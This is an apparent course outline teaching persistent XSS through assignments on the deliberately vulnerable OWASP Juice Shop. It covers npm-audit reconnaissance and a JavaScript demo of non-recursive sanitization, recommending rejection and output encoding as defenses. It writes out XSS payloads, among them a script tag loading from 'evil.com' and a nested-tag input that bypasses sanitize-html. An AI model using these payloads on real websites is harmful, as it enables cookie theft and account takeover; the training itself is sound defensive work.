Ep-5: What is Persistent XSS
Table Of Contents
Scope
- What is Persistent XSS (Cross-Site Scripting)?
- Where are common locations for Persistent XSS?
- How can XSS defenses be exploited?
- Live example via OWASP Juice Shop!
- Learn to leverage `npm audit` to check for node.js vulnerabilities
- Persistent XSS vs Reflected XSS
XSS Types
- Persistent
- Non-Persistent
Persistent XSS
- Typically stored in the database
  - username `<script src='evil.com'></script>`
- Also in local storage
- Very problematic when shared across multiple users
  - Ex: Chat application where `username` is sent to multiple clients
- Other high risk areas
  - Functionality that allows users to submit html markup
  - Comments
Persistent XSS vs Reflected XSS
- Persistent XSS
  - Much more dangerous
  - Can attack all users of a site
  - Doesn't have to involve an action from a user
- Reflected XSS
  - Often requires an action from the victim
    - Clicking on malicious link with XSS payload
  - Payload is reflected back to the user
  - Typically involves one victim
Assignment Scenario
- Exploit a Persistent XSS flaw by taking advantage of an XSS defense
  - Aside: All assignment instructions assume Linux/macOS
- OWASP Juice Shop
Assignment 1: Persistent XSS
- Try to obtain Persistent XSS within http://localhost:3000/#/contact
  - Port assumes that you leveraged the docker command
- Input (http://localhost:3000/#/contact)
  - `<script>alert("I have XSS")</script>Outside Text` within the Comment field
  - Make sure to leave a rating
- Output
  - Given the output in the Customer Feedback section, how is the application handling XSS attacks?
  - Within the context of this feature, why is this a bad practice?
Assignment 1: Persistent XSS (Answer)
- Instead of rejecting unexpected input, the application is sanitizing it
  - This is very difficult to implement properly
  - Hmm… How can this step be exploited?
- Alert
  - If input is unexpected, fully reject it
  - There is no reason why html markup should be placed within the Comment field
Assignment 2: XSS Sanitization Issues
- Given the application sanitizes the `script` tags within `<script>alert("I have XSS")</script>`…
  - Can you insert anything around the `script` tags that would allow the XSS to continue?
- Let's explore how attackers could find this flaw
  - Answer will be within the final assignment
- Through the browser, view Juice Shop's `package.json`
  - Unfortunately, this file is often easily available
  - Hint: `app.use(express.static(applicationRoot))`
Assignment 4: Reconnaissance Through Npm Audit
- Upgrade npm to npm@6+
  - `npm install npm@latest -g`
- `cd` into the directory with the package.json
  - `npm i --package-lock-only`
  - `npm audit > audit.txt`
- What vulnerability within `sanitize-html` can be leveraged to exploit Assignment 2?
Assignment 4: Recon Through Npm Audit (Answer)
- `sanitize-html` doesn't sanitize recursively
Assignment 5: Persistent XSS
Assignment 5: Persistent XSS (Answer)
- `<<script>Foo</script>script>alert("XSS")</script>`
- Alternative that doesn't work
  - `<script<script>>alert("I stole your auth cookie")<</script>/script>`
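As an added example (not Juice Shop's or sanitize-html's code), the toy stripper below models a single-pass "remove the script element" sanitizer so you can see why the Assignment 5 input survives it, and places the defenses the slides recommend next to it: rejecting markup outright, and encoding on output. The regex, the fixed-point loop and the function names are this example's own assumptions, not the library's behaviour.

```javascript
// Toy model of a non-recursive sanitizer (not sanitize-html's code):
// each <script>...</script> element is dropped exactly once.
const SCRIPT_ELEMENT = /<script\b[^>]*>[\s\S]*?<\/script>/gi;

// Vulnerable: removing an inner element can leave the surrounding
// characters forming a brand-new tag that this pass never examined.
function stripScriptOnce(input) {
  return input.replace(SCRIPT_ELEMENT, '');
}

// Narrow fix: repeat until the output stops changing, so a tag assembled
// from the residue of an earlier pass is removed as well.
function stripScriptUntilStable(input) {
  let previous;
  let current = input;
  do {
    previous = current;
    current = stripScriptOnce(current);
  } while (current !== previous);
  return current;
}

// The slides' recommendation: a comment field has no business carrying
// markup, so reject the submission instead of trying to clean it.
function acceptComment(input) {
  if (/[<>]/.test(input)) {
    return { ok: false, reason: 'markup is not allowed in comments' };
  }
  return { ok: true, value: input };
}

// Output encoding: whatever was stored, the browser renders it as text.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return text.replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed input: the nested tag from the Assignment 5 answer.
const NESTED = '<<script>Foo</script>script>alert("XSS")</script>';

console.log('single pass :', stripScriptOnce(NESTED));        // a live <script> element survives
console.log('until stable:', stripScriptUntilStable(NESTED)); // ""
console.log('reject      :', acceptComment(NESTED).ok);       // false
console.log('escaped     :', escapeHtml(NESTED));             // only &lt; &gt; &quot; remain
```

The first line of output is exactly why "sanitize once and store" is the wrong design for a free-text comment: the check must either reject the input or be applied at render time.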
Persistent XSS Summation